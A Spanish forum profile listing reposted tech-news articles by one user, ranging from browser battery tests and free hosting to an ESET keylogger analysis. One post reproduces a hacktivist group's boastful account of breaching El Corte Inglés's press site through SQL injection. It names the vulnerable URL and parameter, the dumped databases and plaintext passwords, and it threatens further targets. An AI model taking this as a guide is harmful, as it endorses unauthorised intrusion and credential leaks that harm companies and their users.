Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - morodog

#1
Buenas a todos Undercoders, hace algo de tiempo tenía una herramienta que cumplía muy bien su propósito de sacar todos los emails de una página web. Me encuentro testeando una cosa y me hacía falta un programa similar, todo lo que veo son de pago.

Alguno me recomienda?


Un saludo.
#2
Este experimento de Microsoft demuestra cómo Google Chrome devora tu batería (y tu RAM).




Google lleva años, literalmente, prometiendo mejoras en el consumo de energía de Chrome, pero estas nunca terminan de llegar. Aprovechando la coyuntura, Microsoft ha preparado hábilmente una serie de experimentos que comparan el navegador contra el suyo propio, Edge. Los resultados son demoledores.


Son dos, en concreto: el primero simula en un entorno controlado el comportamiento típico de un navegador a través de páginas populares de internet, el segundo reproducción streaming de vídeo HD.

El resultado es que las comparaciones son odiosas, pero necesarias. En lo relativo al streaming Google Chrome aguanta "solo" 4 horas y 20 minutos, mientras Edge se acerca a unas cifras que suponen entorno a un 70% más, 7 horas y 22 minutos. Opera, que también aparece en la comparativa, se queda a un 17% menos de rendimiento y Firefox se aleja ya al 43%. No hay datos para Safari.

La parte que mide el comportamiento típico de un usuario en internet ha sido evaluada de dos maneras distintas. Por un lado el entorno controlado, una serie de visitas automatizadas (con scrolling, clics y midiendo tiempos de carga). Por otro la telemetría agregada de millones de dispositivos con Windows 10 y que Microsoft recoge anónima y automáticamente.




La primera gráfica muestra que, de nuevo, el rendimiento de Edge es muy superior (dudo que Microsoft hubiese publicado los resultados en caso contrario), pero también como Firefox consume todavía más batería que Chrome en ese caso concreto. A la izquierda del todo aparece el consumo "base" del PC, simplemente por estar encendido.



Puesto que el test se realizó utilizando Microsoft Surfaces, la telemetría ayuda a ver cómo se comparan esos datos en una diversa base de dispositivos y situaciones. De nuevo, gana Edge.

Aunque los resultados instan a levantar una vez más el hacha de guerra entre los partidarios de uno y otro navegador, la realidad es que al final del día no existe uno que sea perfecto. El problema del consumo en Chrome, eso sí, es uno que Google debería resolver más pronto que tarde.


FUENTE| gizmodo



#3
Last Audit PC escanea tu ordenador en busca de problemas de seguridad o privacidad


Hoy en día la seguridad y la privacidad son dos de los términos que los usuarios dan una mayor importancia a la hora de hacer uso de sus ordenadores o navegar por Internet. Lo cierto es que hoy en día son muchas las amenazas que circulan por la red y que se distribuyen de distintas maneras y a través de determinados medios con el único objetivo de infectar nuestros equipos.

Es por eso que la gran mayoría de usuarios cuente en sus equipos con diferentes programas de seguridad como antivirus o firewall, sin embargo, existen otras herramientas que nos pueden ayudar a realizar una auditoría de nuestros ordenadores para así detectar cualquier riesgo de amenaza o vulnerabilidad antes de que seamos atacados o infectados.




Uno de los más populares es Last Audit PC, una aplicación portátil, por lo que no requiere de instalación y que puede ser ejecutada en cualquier ordenador si nos la llevamos en una memoria externa. Lejos de ser un antivirus, lo que Last Audit PC ofrece, es una herramienta que nos permite realizar un escaneo de nuestro ordenador y nos genera un informe con todos los elementos escaneados y aquellos puntos críticos que nos podrían ocasionar problemas de seguridad o privacidad.

Last Audit PC permite seleccionar distintas unidades o ubicaciones de red para escanear, así como la configuración del sistema, las contraseñas almacenadas en nuestros navegadores, etc. Una vez iniciemos el escaneo, se nos mostrará una barra de progreso para conocer el avance del proceso y cuyo tiempo de ejecución dependerá de todas las opciones que se hayan marcado para el análisis y la auditoría.





Una vez finalizado, la herramienta genera un completo informe en formato HTML, por lo tanto puede ser visualizado desde el navegador y donde se podrá ver de forma clasificada por colores todos los riesgos encontrados. En color rojo se mostrarán las vulnerabilidades más críticas, como errores de configuración o información sensible más accesible, en color naranja estarán marcadas las vulnerabilidades importantes, en azul la información más valiosa que puede ser víctima de ataques y en color verde la información que podría ser de algún interés para los atacantes.

Entre las características principales de Last Audit PC cabe destacar que es capaz de escanear la seguridad de nuestras cuentas, credenciales, las macros de diferentes documentos, el historial de navegación, las cookies, archivos ejecutables sin firmar, aplicaciones maliciosas, conexiones WiFi, etc.

PROGRAMA: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

FUENTE| adslzone
#4


Seguramente todo el mundo habrá probado en alguna ocasion a hacer una página web; desde las míticas páginas web "pre-cocinadas" de hosting web como Galeón o Iespana hasta métodos más profesionales como hacerla desde cero o usar un CMS, como WordPress, Joomla o similares. Son muchas las alternativas, pero cuando estamos comenzando y no tenemos mucha idea del tema no conviene apostar por una inversión monetaria en un hosting web cuando, para unos primeros pasos -muy iniciales- hay hosting web gratuitos que nos pueden servir a tal efecto.

Antes de entrar en materia de los que para mí son los 10 mejores hosting web gratuitos, conviene destacar varios aspectos de un hosting web gratuito. En la mayoría de casos, incluyen publicidad para autofinanciarse... pero no siempre. En la lista que he elaborado he procurado no incluir, en la medida de lo posible hosting web que incluyan publicidad en nuestra web y salvo uno, el resto no incluye publicidad.

Lo otro puede resultar obvio, pero a veces hay que recordarlo: si el servicio que ofrece un hosting web gratuito fuese igual de bueno que uno de pago, ¿quién querría el de pago? Pues eso, el servicio, calidad y prestaciones dista mucho de lo que acaba siendo un hosting web de pago aunque para un uso muy básico. Ahora, veremos qué nos ofrece cada una de las opciones de hosting web que he seleccionado para esta lista de mejores hosting web gratuitos:

1. 000WebHost

No pretendo hacer de esta lista un orden de hosting web gratuitos de mejores a peores, pero lo cierto es que empiezo con el que probablemente sea el mejor hosting web gratuito en la actualidad. Por lo menos, eso es lo que opina la gran mayoría de usuarios que lo ha probado. Por características desde luego que merece ser considerado el mejor en la actualidad: ofrece 1500 Mb de espacio en disco, una transferencia mensual de 100 Gb, 5 subdominios, 5 cuentas de correo electrónico, 2 bases de datos MySQL, panel de control, PHP, IMAP... lo básico para montar una web sencilla. Si lo preferimos podemos apostar por su pack de premium que nos ofrece por 4,84 dólares al mes, espacio en disco y transferencia mensual ilimitada como principales reclamos.

2. XtreemHost

Xtreem Host es considerado junto a 000 Web Host uno de los mejores hosting web gratuitos. Se debe, entre otras cosas, a sus 5500 Mb de espacio en disco, 200 Gb de transferencia mensual, 4 mb de tamaño límite por archivo, 50 bases de datos MySQL, phpMyAdmin 3.2.5, 50 subdominios, creador de páginas webs con más de 600 plantillas predefinidas... sin duda, uno de los hosting web más completos que existen que se complementa con un servicio de pago por 44 dólares al año que te ofrece todo lo anterior de manera ilimitada (transferencia mensual, espacio en disco, etc).

3. Zoby Host

Zoby Host es el único hosting web gratuito de esta lista que he confeccionado. De hecho, ése es el principal factor por lo que le he incluido no porque sus características sean especialmente buenas porque no es el caso. Ofrece apenas 30 Gb de transferencia mensual, soporte PHP y MySQL, 1 Gb de espacio en disco, 20 bases de datos MySQL y varios CMS preinstalados a falta de un clic como WordPress, Joomla, Drupal u osCommerce. Un detalle curioso cuanto menos: sólo te puedes registrar y obtener un hosting web gratuito si tienes una dirección GMail, porque de lo contrario no podrás registarte.

4. Free Web Hosting Area


Free Web Hosting Area se trata de un hosting web gratuito un tanto particular y es que no incluye publicidad para aquellos sitios web que tengan un tráfico bajo; es una buena manera de sólo "penalizar" a los que tengan más tráfico. Así, sólo penaliza a un porcentaje bajo de los usuarios que usan sus servicios y les resulta más rentable. En cuanto a características, ofrecen hasta 1500 Mb de espacio en disco con un límite de tamaño por fichero de 12 Mb, transferencia mensual ilimitada, 5 bases de datos MySQL o phpMyAdmin instalado son algunas de sus principales características.

5. Free Hostia

Si el nombre, Free Hostia, ya resulta particular... el diseño lo es aún más. Pero eso importa poco en la página web de un hosting. Free Hostia es un hosting web bastante usado por muchos usuarios y destaca por no meter publicidad, ofrecer 1 base de datos MySQL, 250 Mb de espacio en disco, transferencia mensual de 6 Gb, 3 cuentas de correo electrónico POP3 e IMAP, 10 Mb de espacio en disco por cada base de datos y distintos scripts preinstalados a falta de un único clic. Sencillo a la par que modesto aunque no siempre necesitamos de grandes características más aún cuando se trata de nuestros primeros pasos en Internet.

6. AwardSpace

En lo que respecta a Award Space, sus características son más modestas: 200 MB de espacio en disco, transferencia mensual de 5 Gb, 5 subdominios, 2 dominios, PHP, 1 base de datos MySQL, acceso vía FTP, 5 direcciones de e-mail son las principales características. A diferencia de otros que he mencionado en los que su principal negocio era el hosting web gratuito, Award Space no se centra únicamente en éste sino todo lo contrario: en la propia portada de la web podemos ver los distintos planes de pago que llegan hasta los 7 dólares al mes ofreciendo de manera ilimitada tanto espacio en disco, como bases de datos o transferencia mensual entre otras características.

7. 110 Mb

110 Mb es un hosting característico porque cumple a la perfección su nombre: ofrece 110 Mb de espacio gratuito en disco combinado con 100 Gb de transferencia mensual así como un "Site builder" para crear páginas web fácilmente. Creo que de todos los hosting web gratuitos que he mencionado es el peor con diferencia ya que todas sus características están bastante limitadas y, encima, meten publicidad en en el footer de nuestra web, insertando links. No muy recomendable aunque sí merece la pena su hosting de pago que por 4,95 dólares (promoción actual) te dan casi todo ilimitado y, además, obtendrás 40 dólares por cada referido que les mandes.

8. Black Apple Host


Intentando imitar a Apple con la manzana pero cambiándola de color y realizando algún cambio estético más, Black Apple Host es un hosting web en el que te puedes registrar en menos de 30 segundos y te ofrece 5 Gb de espacio en disco, 20 Gb de transferencia mensual, el panel de control LayeredPanel (no usa cPanel como la mayoría de hostings de pago). Otro aspecto a tener en cuenta es que cuenta con varios CMS preinstalados (WordPress o Joomla entre otros) de manera que con tan sólo un clic estarán listos para ser usados. El inconveniente de contar con CMS preinstalados es que difícilmente contarán con la versión más reciente del CMS y no es sencillo de actualizar.

9. ByetHost

En este caso, ByetHost se trata de un hosting web gratuito, también sin publicidad, con panel de control y un instalador de CMS automático (bastante limitado: SMF, PHPbb o Media Wiki), 5500 Mb de espacio en disco, 200 Gb de transferencia mensual, acceso vía FTP y subdominios gratuitos a elegir dentro de varios subdominios distintos. Su principal reclamo es phpMyAdmin y, sobre todo, sus 50 bases de datos MySQL algo no muy frecuente en hostings web gratuitos.

10. Run Hosting

Run Hosting cuenta con un diseño bastante modesto e incluso, yo diría que no inspira nada de confianza. A esto sumamos que sus características no son nada especiales puesto que apenas cuenta con 150 Mb de espacio en disco, 4 Gb de transferencia mensual, 1 dominio, 1 base de datos MySQL y soporte PHP, Perl, CGI... nada interesante. Menos interesante resulta aún sus planes de hosting de pago, con unos precios bastante elevados y unas características muy mejorables en otros hosting web gratuitos anteriormente mencionados.

FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5


En el Centro de Investigación Optoelectrónica de Southampton han desarrollado un método de almacenamiento que permite almacenar 360 terabytes en un disco de cuarzo. Esos datos pueden leerse utilizando láseres ultrarrápidos, de modo que se comportan más o menos como los tradicionales. Pero lo más impresionante es que los datos pueden perdurar 13 800 millones de años.

Si te suena esa cantidad de tiempo es porque coincide casualmente con la edad de nuestro universo. En otras palabras: si hubieras comprado un disco de esos el día del Big Bang, hoy todavía estaría fresco y con los datos tan campantes.

Por eso no es del todo incorrecto decir que esos datos pueden considerarse inmortales o hablar de que «duran una eternidad» – y además a temperatura ambiente (aunque pueden soportar temperaturas de hasta 1000°C).
La tecnología, denominada 5D, guarda los datos en forma de tres capas de puntos a nanoescala, separados unas cinco micras. Las cinco dimensiones son las tres espaciales además del tamaño y la orientación. Se pueden leer con un microscopio óptico y filtros polarizados sin problema; de hecho ya hace un par de años guardaron y recuperaron un archivo de 300 KB utilizando este concepto.


FUENTE| microsiervos
#6


Es lo que podríamos denominar la gran batalla del click, un negocio global basado en el volumen que mueve miles de millones y en el que combaten decenas de gigantes empresariales y en el que los ingresos se generan cuando un usuario o cliente hace click, ya sea para descargarse una aplicación, para mandar un mensaje, o iniciar una búsqueda.

La escala del negocio es casi incomprensible para el cerebro humano así que para volver sus cifras terrenales tenemos que simplificar sus cifras a una escala que sea más terrenal. En el primer cuadro tenéis lo hace los usuarios en cada uno de los grandes gigantes de internet cada 10 segundo.

Entre otras cosas, en el mundo , cada 10 segundos se mandan 57 mil tuits, se dan más de 500 mil me gustas en Facebook, se mandan 34 millones de correos electrónicos o se descargan más de 18 mil aplicaciones. En total en sólo 10 segundo se transfieren por internet cerca de 225,000 GB en datos.

Este impresionante flujo de clicks que hacen los usuarios permiten a los gigantes de internet generar los siguientes ingresos cada 10 segundos:




FUENTE| gurusblog
#7


Repasamos los lugares más raros para montar servidores de datos que las compañías han intentado aprovechar.

Cuando usamos un servicio cualquiera de Internet, toda la información relacionada se guardan en ordenadores, llamados servidores, que conforman centros de datos, grandes instalaciones diseñadas especialmente para mantenerlos.

Y es que cuando juntas muchos servidores en un solo sitio, empiezan a aparecer necesidades que no puede cubrir cualquier localización; por ejemplo, tienes que asegurarte de que cuenta con una refrigeración adecuada para que los procesadores y los discos duros nunca alcancen temperaturas críticas. Y por supuesto, necesitas grandes cantidades de energía para que todo funcione.

Normalmente los centros de datos están en sitios muy aburridos, como polígonos industriales, almacenes o lugares similares, ya que realmente en ellos no trabaja mucha gente, y es más importante dar a los servidores todo lo que necesitan.

Y luego hay momentos en los que a una compañía se le ocurre una locura, y monta un centro de datos en un lugar absurdo. Ahora vamos a repasar algunos de esos sitios especiales.

En una fábrica de combustible nuclear



La ciudad alemana de Hanau iba a contar con una fábrica que produciría barras de uranio y plutonio enriquecido para ser usadas en plantas nucleares, pero no llegó a ponerse en marcha y acabó abandonada.

La compañía de Internet 1&1 decidió aprovechar la localización para montar sus servidores, usando energías de fuentes renovables.

En una cueva debajo de una montaña



La compañía Iron Montain hizo honor a su nombre cuando decidió montar un centro de datos debajo de una montaña.

Más concretamente, es una mina de caliza de unas 400 hectáreas, conocida como la "Habitación 48″. Sólo hay una entrada y salida, por lo que está considerado como uno de los sitios más seguros del mundo.

En el círculo polar ártico




Facebook decidió que necesitaba refrigerar mejor sus servidores, así que, ¿qué mejor que tirar lo más al Norte como sea posible? Así nació el "Node Pole", que aunque no está en el mismo polo norte, sí que está cerca, en la localidad de Lulea en Suecia.

La instalación aprovecha perfectamente el duro entorno, obteniendo energía de los ríos cercanos y enfriando los componentes eléctricos con el mismo viento nórdico que sopla en la zona. Gracias a esto sólo necesita el 30% de los generadores que normalmente usa una instalación como esta.

En una micronación que nadie reconoce




El Principado de Sealand es uno de los lugares más raros que existen. Es una plataforma marítima construida en la Segunda Guerra Mundial, que después de ser abandonada por el gobierno británico sirvió de base para que una familia se plantase en ella y se autoproclamase como un país. Desde entonces ninguna nación ha reconocido su existencia, y oficialmente forma parte del Reino Unido, pero eso no ha impedido a sus propietarios intentar hacer negocio con ella.

Durante la década de los 2000, aprovechando la subida del sector de la web, Sealand creó la compañía HavenCo que prometía servidores cuyos datos estarían a salvo de las autoridades de cualquier país, e incluso Pirate Bay se planteó comprarla. Pero en 2008 la compañía dejó de existir de la noche a la mañana, y desde entonces es sólo una curiosidad más que sumar a esta plataforma, aunque en 2013 hubo intentos de revivirla.

Debajo del mar, matarile, rile, rile




Microsoft ha sido la última en experimentar con esto de montar un centro de datos en un sitio absurdo. En su caso ha sido el fondo del mar. El pasado agosto sus ingenieros colocaron una enorme cápsula en el Océano Pacífico, aunque la profundidad no fue mucha, apenas 10 metros.


En el interior de la cápsula había un sólo servidor, con nitrógeno presurizado para mantener sus temperaturas controladas, y todo tipo de sensores para comprobar el efecto que el mar tenía en su funcionamiento. El objetivo es que en el futuro estos servidores funcionen con la energía de las olas y se refrigeren con el agua marina.


FUENTE| omicrono
#8


No hay gigantes invencibles cuando de tecnología informática se trata. Son muchos los actores que intervienen en la puesta online de cualquier servicio: developers (desarrolladores), analistas, proveedores de hosting, administradores, sistemas, etc., y cuanto más compleja es la empresa, más posibilidades de errar existen.

En el caso que abordamos ahora, pero que no difiere de otros que hemos "atacado" (Capio, Moncloa, Inditex...), el principio pasa por recopilar toda la información posible del objetivo: servidores, dns, webs, proveedores de desarrollos específicos, y mucha labor de búsqueda y análisis. Podemos estar meses analizándola en nuestras cuevas, discutiendo entre cervezas y convenciéndonos de la "legitimidad" hacktivista del target; esperando la oportunidad de difundir la información que hemos considerado debe ser conocida, o simplemente, hacer escarnio mediante el #LOL y el #LULZ de aquellos a quienes consideremos merecedores de tal según nuestro etílico criterio.

Los chicos de la tecla de ECI (en adelante El Corte Inglés) tienen muchos servicios en la Red y como sabemos que están hasta el gorro del trato que la empresa les dispensa, se habrán dispersado un poco de tan ingente tarea (y con razón).

Hay de todo un poco:






No es nada complicado jugar un poco con los buscadores disponibles.

Habitualmente, todas las grandes corporaciones son pretenciosas y despistadas en cuanto a las necesarias auditorías de sus sistemas. Naturalmente que cuentan con personal técnico cualificado en sus departamentos, pero no todo es abarcable. Un ejemplo es la confianza en terceros proveedores de aplicaciones.

Y este ha sido el caso (que no único) de este gigante empresarial tan famoso por el trato que dispensa a los clientes, pero que poco trasciende cuando abusa, maltrata y se pasa por el forro los derechos de sus trabajadores.

1- La parte que todos sabían: la vulnerabilidad tonta, pero en la que nadie reparó.

Y ahora viene esa parte que llamamos técnica en la que todos los expertos del mundillo de la (in)seguridad informática (la comunidad "hacker blanquita") dicen: ¡Bah!, una simple vulnerabilidad de primero de hacking.

Pero la gracia no está en que exista, amiguitos, sino en encontrarla y explotarla sin hacer de pentester legal que avisa de ella a la empresa a cambio de fama o algún tipo de reconocimiento. Eso, es tan ilegal como lo que hacemos nosotros, así que optamos por darle otro aspecto más social como es el de liberar la información y que cada cual saque las conclusiones que prefiera. Eso ya nos da igual.

Buscamos el alojamiento corporativo de ECI:





¡Vale! Un server dedicado en la casa del amigo Chema Alonso :P

Qué tenemos alojado en esa IP:



El mapeo del hosting no nos aporta más que unas vuelnerabilidades heurísticas sobre los puertos 80 y 443 ( CVE:CVE-2007-6750 y CVE:CVE-2014-3566  OSVDB:113251) que vamos a obviar ante la certeza de que timofónica no es tan obvia.

Exploramos de forma manual cada uno de los dominios y subdominios hasta llegar a dos concretos que nos sorprenden, y que ahora están redirigidos después de publicar el leak. Son: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

La sorpresa viene porque usan una aplicación de terceros. Una empresa aparentemente potente en el ámbito de la imagen, el márketing y la consultoría acceso y que facilita a sus clientes (veremos algunos) un sistema de gestión de contenidos para comunicaciones y notas de prensa.





Aquí tenemos una buena presa a la vista de sus "imperfecciones" en los desarrollos. Ejemplos:

- Mal manejo de las URL's no acotando longitud de caracteres y manejo de errores




- Exposición abierta de sistema de acortamiento de URL's que podría permitir utilizarlo para redireccionar a ubicaciones malintencionadas




Y lo más interesante... un panel de gestión de contenidos único para todos sus clientes




2 - Explorando el proveedor de contenidos de terceros (Acceso) utilizado por ECI (entre otros).

Acceso ha optado por Amazon como proveedor de servicios de alojamiento en la nube para sus webs principales y la catalana Colt Technology Service  para otros desarrollos entre los que encontramos:

CitarNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Buena cartera de clientes, ¿eh? (No seáis juguetones ¬¬)

Y, naturalmente, los referidos de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta redireccionados a las webs principales y suponemos que desmontado el gestor de Acceso.

Ya nos han preguntado varios periodistas especializados si nos hemos "divertido" también con esos targets y la verdad es que no hemos sabido responderles. ¡Es mucho delito eso! :-P

Pero centrémonos en lo realizado y no en lo que podría ser...

Un vistazo somero a las dos webs del ECI nos proporciona la posibilidad de explotación de SQLInjection en algunos parámetros:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

prensa.elcorteinglescorporativo.es/view_object.html?cat_id=03&obj=16,c,22

La explotación nos descubre un back-end DBMS: PostgreSQL > 8.1 sobre un Linux Ubuntu 10.04 (Lucid Lynx) y tecnología webserver PHP 5.3.2, Apache 2.2.14

Se liberan 3 BD

Código: php
[*] information_schema
[*] pg_catalog
[*] public


  • public con 125 Tablas es el core de la aplicación, mientras que
  • pg_catalog es utilizada por el sistema de listas de correo.

    El dump de las tablas de usuarios nos proporciona otra sorpresa: los passwords no están hasheados, se visualizan en plano para mayor alegría y menos curro para descifrarlos.

    Suponemos que los sysadmins de Acceso ya estarán al loro de la exposición de la ropa interior de su gestor de contenidos, pero si no, ¡ya estáis corriendo!

    Las capturas de pantalla que siguen corresponden a algunos usuarios testados

    * Menú del gestor de actividades:




    * Gestión de listas de correo:




    * Gestión de usuarios:




    (los usuarios ya no existen por lo que no ofuscamos ni user ni pass)

    El resto ya es conocido por todos. Dumpeo y exposición de lo que consideramos interés público.

    Conclusión

    Seguimos considerando como objetivos válidos de nuestras acciones cualquier desarrollo, aplicación, o servicios online de ECI o cualquier otro entramado empresarial que se distinga por el maltrato y/o abuso de sus trabajadores, la ocultación, corruptelas, nazi-fachas y/o asociaciones o medios de comunicación vendidos a un sistema donde sólo el poder y la economía priman sobre otros valores. El conocimiento debe ser libre y la información liberada. ¡Esperadnos!

    Esperamos no haberos aburrido con nuestras disquisiciones de estudiantes del código. Intentamos hacerlas lo más comprensibles posible, aunque asumimos no poder evitar la utilización de algunos palabros informáticos malsonantes.

    No tenemos ni la capacidad ni los medios (y mucho menos los pelos y el gorro de lana del Chema) pero nos esforzamos en hacer muchos cursos online de juakers y llenamos las paredes de certificaciones. No nos perdemos ni una CON y cantamos alabanzas a Nico y a Román :-P pero ni a tiros nos invitan los tios a unas cañas. Los de H&B sí que lo hacen y aunque acudimos a sus reuniones supersecretas con tapas de chipirones, y frecuentamos el barrio moro-judio de Córdoba, el que ha escrito ese libro de "Los hombres que susurran a las máquinas", el Salas de la capucha, no nos ha citado y ha preferido irse con los cursis de París. También será porque nosotros no les susurramos y las tenemos hechas unos zorros.

    Ya más en serio, disculparnos con aquellas inocentes a las que hayamos chafado su trabajo estos días. Sabemos que esos daños colaterales hacen pupa, pero, amiguetes, curráis en algo donde también hay que asumir riesgos. Sed un poco como nosotros: sonreid, bebeos una buena birra y llamadnos ...



    FUENTE| la nueve
#9


Mañana es el Safer Internet Day, y Google ha preparado un obsequio para todos los que quieran hacer un buen gesto en sus cuentas de usuario. Es posible que ya te suene del año pasado: si haces un chequeo de seguridad de tu perfil de Google, la compañía te regala 2 GB de espacio.

Esos 2 GB no son temporales, así que no desaparecen al cabo de un tiempo como ocurre con algunas promociones de Dropbox ligadas a algunos dispositivos. Y si ya hiciste esta promoción el año pasado no te preocupes: puedes repetirla y el espacio nuevo se te agregará igualmente.
Cómo conseguir 2 GB gratis para Google Drive en cinco minutos

Lo único que tienes que hacer es acceder a esta página web e iniciar sesión con tu cuenta de Google. En cuanto lo hagas tendrás que confirmar varias cosas, empezando por tu número de teléfono (que te puede salvar la vida si olvidas tu contraseña algún día) y tu correo alternativo para recuperación de acceso.




A continuación tendrás que revisar el historial de dispositivos que han utilizado tu cuenta junto con su ubicación y fecha, para que compruebes que tú y sólo tú has iniciado sesión en tu perfil. En cada uno de los dispositivos habrá una flecha que desplegará una lista de las localizaciones en las que se ha estado usando ese terminal.

Finalmente tendremos que revisar la lista de servicios a los que hemos dado permiso para que utilicen nuestra cuenta de Google. Aquí es importante que mires todos los programas que ya no utilices y elimines sus permisos, ya que no es recomendable cederlos cuando lleves tiempo sin usar algún servicio. Deja sólo aquellos que utilices frecuentemente.

Y listo, ya tienes 2 GB más en tu cuenta de Google. Recuerda que ese espacio puede ser usado en Gmail y en Google Drive, puedes consultar todos los detalles desde las preferencias de almacenamiento de tu perfil.


FUENTE| genbeta
#10

Principalmente debido al avance que las conexiones a Internet van teniendo paulatinamente, cada vez es más habitual que trabajemos directamente en la Nube o través de la Red interactuando en tiempo real con otros PCs.

Para ello, como muchos sabréis, existen multitud de aplicaciones que básicamente nos conectan de manera remota con otros ordenadores para que podamos manejarlos desde cualquier lugar del mundo. De ese modo los usuarios tienen la oportunidad de acceder de manera remota a todo tipo de ficheros o tratar con aplicaciones que están instaladas en otros PCs, algo que se puede llevar a cabo de modo totalmente fluido gracias a las conexiones actuales.

A pesar de que en el mercado existen diversas alternativas para llevar cabo estas tareas, el propio sistema operativo de Microsoft, Windows 10, al igual que ocurría con otras versiones anteriores, implementa su propia aplicación de Escritorio Remoto, tal y como nos muestran los compañeros de RedesZone. Cuando instalamos Windows 10 en nuestro equipo, por defecto esta función se encuentra desactivada por motivos de seguridad, por lo que si necesitamos utilizarla, previamente tendremos que activarla «a mano».


A continuación os vamos a mostrar la manera de hacerlo, pero antes de ello deben quedar claros los peligros que esto conlleva, ya que una vez activado el servicio, cualquiera que conozca nuestra dirección IP, nombre de usuario y contraseña, podrá acceder a nuestros datos y manejar nuestro equipo. Asimismo cabe mencionar que la versión Home de Windows no dispone de Escrito Remoto.


En Windows 10, para llevar a cabo el proceso tendremos que situarnos en PC/Configuración avanzada/Configuración avanzada del sistema/Acceso remoto, tras lo cual accedemos a la ventana de configuración de la aplicación Una vez en ella nos encontramos con dos secciones: "Asistencia remota" y "Escritorio Remoto"; en este caso concreto nos interesa la segunda de ellas. Por lo tanto pinchamos sobre "Permitir conexiones remotas a este equipo" para activar el servicio. En adelante todos los usuarios del PC en cuestión tendrán activa la función de Escritorio Remoto, por lo que por motivos de seguridad es recomendable especificar las cuentas de usuario que podrán usar este servicio desde el botón llamado "Seleccionar usuarios".

Una vez hayamos acabado no tendremos más que acceder con alguna herramienta de Escritorio Remoto que tengamos instalada en otro ordenador o dispositivo móvil para manejar este equipo.



FUENTE| adslzone
#11


Si tienes ganas ya de cambiar el diseño de tu navegador web no hace falta que esperes mucho más tiempo porque desde hoy podrás modificar la interfaz de Google Chrome gracias a que Chrome tendrá aspecto Material Design y te vamos a enseñar cómo activarlo.

Si bien Google Chrome tendrá en un futuro un diseño Material Design, desde que quieras puedes activar la nueva interfaz tocando una serie de parámetros internos del navegador. Eso sí, es posible que te empiece a fallar y por eso te recomendamos que si es así vuelvas a dejar todo como estaba.

Cómo activar Material Design en Google Chrome


Si quieres ver primero una prueba de como se vería el navegador con el estilo Material Design ya activado puedes acceder a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta escribiendo lo anterior en la barra de direcciones.



Como verás la interfaz ha cambiado y te encontrarás con colores, tipografía y demás cosas distintas. Esa podría ser la futura imagen que tendría el panel de configuración de Google Chrome, porque si te fijas en la barra de direcciones, estás abriendo la configuración con estilo Material Design.
Pero volviendo a lo que nos interesa, para activar definitivamente el Material Design a todo el navegador tendrás que irte, como siempre, a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Busca la opción "Material Design en la interfaz gráfica del navegador", actívala y pulsa el botón "reiniciar ahora" y activarás el nuevo diseño a la totalidad de Google Chrome.



Con solo modificar dichos parámetros tendrás ya a Google Chrome con el nuevo diseño de Material Design.

¿Qué te parece el nuevo diseño que tendrá Google Chrome próximamente?



FUENTE| genbeta
#12


Desde finales del año pasado y como parte del monitoreo que desde el Laboratorio de Investigación de ESET Latinoamérica hacemos de las amenazas que se propagan en la región, pudimos detectar una serie de archivos maliciosos con características muy similares que se han estado propagando por países de Centroamérica y por México.

Desde finales de septiembre del año pasado, varias muestras de códigos maliciosos de la familia RAR/Agent estuvieron afectando a usuarios de la región; de hecho, a la última de estas variantes la vimos propagarse entre usuarios de Guatemala la semana pasada.

Al empezar a analizar estos códigos maliciosos, nos encontramos con que todas las muestras tienen extensión scr (Windows Screen Saver) y además todas utilizan algún ícono relacionado con Acrobat PDF Reader. En la siguiente imagen podemos darle un vistazo a cómo se veían las nueve muestras más propagadas en países como México, Guatemala y El Salvador:



¿Patrones comunes en los códigos maliciosos o simple casualidad?

Ya el hecho de que todos los archivos tengan el mismo formato y utilicen íconos con temáticas similares levanta sospechas para pensar que podrían estar relacionados. Para verificar esta sospecha, se realizó un análisis de las nueve muestras con Cuckoo para detectar si había elementos en común en el funcionamiento de las amenazas.

En este caso resulta útil el hecho de que Cuckoo arroje los resultados en un archivo json, el cual es fácilmente analizable. De este análisis resultan algunas características comunes a todos los archivos analizados. Dentro de las más relevantes encontramos el hecho de tener un módulo que cumple la función de ser un keylogger, crear archivos con extensión .EXE en la computadora del usuario, instalarse para iniciar con el sistema y generar tráfico de red, entre otras que pueden considerarse como sospechosas.

Así que hasta este punto nos encontramos con diferentes archivos sospechosos que realizan el mismo tipo de actividad maliciosa y que para el usuario se ven de forma similar. Como si fuera poco, a este grupo de características comunes se agrega que todos los archivos han sido compilados a partir de scripts en Autoit.


La misma estructura de funcionamiento


Tras verificar que las muestras vistas tienen un comportamiento similar, era necesario verificar de qué manera funcionan para darnos cuenta si tienen un origen común o, por el contrario, son muestras de campañas de propagación aisladas.

Al revisar los resultados arrojados del análisis dinámico, nos encontramos con una nueva característica común a todos los archivos: todos crean un archivo .EXE y un archivo script que contiene todo el código malicioso pero de forma ofuscada.

El ejecutable no corresponde a un archivo malicioso, ya que solamente sirve para ejecutar scripts en Autoit. Después de trabajar un poco en descifrar el código del script, empiezan a aparecer algunas características de este código malicioso:



Por ejemplo, se puede ver cómo se referencia el script que se va a ejecutar y es invisible durante su ejecución.
